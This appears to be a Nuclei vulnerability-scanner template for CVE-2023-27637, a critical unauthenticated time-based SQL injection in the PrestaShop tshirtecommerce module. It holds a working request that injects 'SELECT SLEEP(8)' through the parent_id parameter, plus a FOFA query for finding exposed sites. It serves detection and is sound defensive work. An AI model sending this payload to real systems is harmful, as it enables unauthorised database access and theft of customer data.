id: CVE-2023-27637 info: name: PrestaShop `tshirtecommerce` Module - SQL Injection author: ritikchaddha severity: critical description: | The tshirtecommerce module for PrestaShop is vulnerable to unauthenticated SQL injection via the designer endpoint, allowing attackers to execute arbitrary SQL queries and extract sensitive information from the database. impact: | Unauthenticated attackers can execute time-based SQL injection through the parent_id parameter in the designer endpoint to extract the complete PrestaShop database including user credentials and order data. remediation: | Update the tshirtecommerce module to the latest version and apply all security patches. reference: - https://security.friendsofpresta.org/module/2023/03/21/tshirtecommerce_cwe-89.html - https://nvd.nist.gov/vuln/detail/CVE-2023-27637 - https://codecanyon.net/item/prestashop-custom-product-designer/19202018 - https://tshirtecommerce.com/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-27637 cwe-id: CWE-89 epss-score: 0.03299 epss-percentile: 0.87289 cpe: cpe:2.3:a:tshirtecommerce:custom_product_designer:2.1.4:*:*:*:*:prestashop:*:* metadata: max-request: 1 vendor: tshirtecommerce product: custom_product_designer framework: prestashop fofa-query: body="Prestashop" && body="tshirtecommerce" tags: cve,cve2023,prestashop,tshirtecommerce,sqli,time-based-sqli,vkev,vuln http: - raw: - | @timeout: 30s GET /module/tshirtecommerce/designer?product_id=900982561&parent_id=1;SELECT%20SLEEP(8); HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - "duration>=8" - "status_code == 200" - "contains(tolower(body), 'product not found')" condition: and # digest: 4b0a00483046022100f0bf2f3b42a8c55be82b3e79f5e41c2fb9e2e3332779beffae11c189c1d4fe8d0221008b796fd9c952141b6d10cf7d4d64ea28fe1f770fce69fddd8257c559b57da1bd:922c64590222798bb761d5b6d8e72950